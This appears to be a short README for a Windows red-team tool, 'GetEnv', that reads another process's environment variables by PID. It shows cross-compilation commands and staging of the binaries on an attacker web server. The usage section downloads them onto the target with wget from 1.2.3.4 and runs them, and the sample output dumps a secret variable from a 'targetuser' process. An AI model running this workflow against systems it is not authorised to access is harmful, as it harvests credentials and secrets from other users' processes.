######
GetEnv
######

|

| Retrieve env from given process id
| Source: https://stackoverflow.com/questions/1202653/check-for-environment-variable-in-another-process

|
|

*****
Build
*****

.. code-block:: bash

    i686-w64-mingw32-g++ getenv.cpp -o getenv32.exe -std=c++17 -static-libgcc -static-libstdc++ -static -m32
    x86_64-w64-mingw32-g++ getenv.cpp -o getenv64.exe -std=c++17 -static-libgcc -static-libstdc++ -static -m64

    sudo mv getenv32.exe getenv64.exe /var/www/html/

|

|

*****
Usage
*****

.. code-block:: powershell

    wget 1.2.3.4/getenv32.exe -O getenv32.exe
    wget 1.2.3.4/getenv64.exe -O getenv64.exe

|

.. code-block:: powershell

    PS C:\users\user\Documents> ./getenv32.exe 4396
    [+] Running x86 process
    [+] Target (4396) is not x86, exiting ... 

    PS C:\users\user\Documents> ./getenv64.exe 4396
    [+] Running x64 process
    [+] Target (4396) is x64, proceeding ... 

    SUPERSECRET="thisismysecret!!"
    ALLUSERSPROFILE="C:\ProgramData"
    APPDATA="C:\Users\targetuser\AppData\Roaming"
    CommonProgramFiles="C:\Program Files\Common Files"
    CommonProgramFiles(x86)="C:\Program Files (x86)\Common Files"
    CommonProgramW6432="C:\Program Files\Common Files"
    COMPUTERNAME="BEEPBOOP"
    ComSpec="C:\Windows\system32\cmd.exe"
    DriverData="C:\Windows\System32\Drivers\DriverData"
    HOMEDRIVE="C:"
    HOMEPATH="\Users\targetuser"
    LOCALAPPDATA="C:\Users\targetuser\AppData\Local"
    LOGONSERVER="\\BEEPBOOP"
    NUMBER_OF_PROCESSORS="2"
    OneDrive="C:\Users\targetuser\OneDrive"
    OS="Windows_NT"
    Path="C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\targetuser\AppData\Local\Microsoft\WindowsApps;"
    PATHEXT=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC"
    PROCESSOR_ARCHITECTURE="AMD64"
    PROCESSOR_IDENTIFIER="AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD"
    PROCESSOR_LEVEL="25"
    PROCESSOR_REVISION="0101"
    ProgramData="C:\ProgramData"
    ProgramFiles="C:\Program Files"
    ProgramFiles(x86)="C:\Program Files (x86)"
    ProgramW6432="C:\Program Files"
    PSModulePath="C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules"
    PUBLIC="C:\Users\Public"
    SESSIONNAME="Console"
    SystemDrive="C:"
    SystemRoot="C:\Windows"
    TEMP="C:\Users\targetuser\AppData\Local\Temp"
    TMP="C:\Users\targetuser\AppData\Local\Temp"
    USERDOMAIN="BEEPBOOP"
    USERDOMAIN_ROAMINGPROFILE="BEEPBOOP"
    USERNAME="targetuser"
    USERPROFILE="C:\Users\targetuser"
    windir="C:\Windows"

|
